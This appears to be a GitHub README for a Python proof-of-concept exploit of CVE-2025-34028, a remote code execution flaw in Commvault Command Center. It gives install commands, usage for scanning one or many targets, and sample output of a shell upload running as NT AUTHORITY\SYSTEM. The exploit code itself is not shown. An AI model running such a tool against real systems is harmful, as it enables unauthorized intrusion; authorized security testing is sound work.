Mattb709/CVE-2025-34028-PoC-Commvault-RCE

CVE-2025-34028 - Commvault Command Center Remote Code Execution

A Python exploit for CVE-2025-34028, a remote code execution vulnerability in Commvault Command Center. This tool allows testing single targets or scanning multiple hosts in bulk.

Features

  • Single target or bulk scanning capability
  • Automatic Commvault instance verification
  • Detailed output with system user information
  • Random path generation for each execution
  • Clean summary table of vulnerable hosts
  • Comprehensive error handling

Installation

git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt

Requirements

  • Python 3.6+
  • Required packages:
    • requests
    • tabulate

Install requirements with:

pip install requests tabulate

Usage

usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)

CVE-2025-34028 Commvault RCE Exploit

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Single target URL (e.g., https://192.168.1.100:8000)
  -f TARGETS_FILE, --file TARGETS_FILE
                        File containing multiple targets, one per line

Examples

Test a single target:

python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000

Scan multiple targets from a file:

python CVE-2025-34028-Commvault.py -f targets.txt

Target File Format

The targets file should contain one target per line in the format:

https://host:port
http://ip

Example targets.txt:

https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443

Output

The script provides:

  • Real-time progress with status for each target
  • Detailed output for vulnerable hosts
  • Summary table of all tested hosts
  • Clear identification of successful exploitations

Sample output:

CVE-2025-34028 Commvault RCE PoC

[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM

[+] Results Summary
+---------+---------------------------------+----------------+---------------------+
| Index   | URL                             | Status         | System User         |
+---------+---------------------------------+----------------+---------------------+
| 1       | https://cvtest.example.com:8000 | RCE Successful | NT AUTHORITY\SYSTEM |
+---------+---------------------------------+----------------+---------------------+

Disclaimer

This tool is for educational and authorized testing purposes only. The author is not responsible for any misuse or damage caused by this program.

License

MIT License - See LICENSE file for details

About

Proof-of-Concept (PoC) for CVE-2025-34028, a Remote Code Execution vulnerability in Commvault Command Center. This Python script scans single or multiple targets, executes commands, and reports vulnerable hosts.
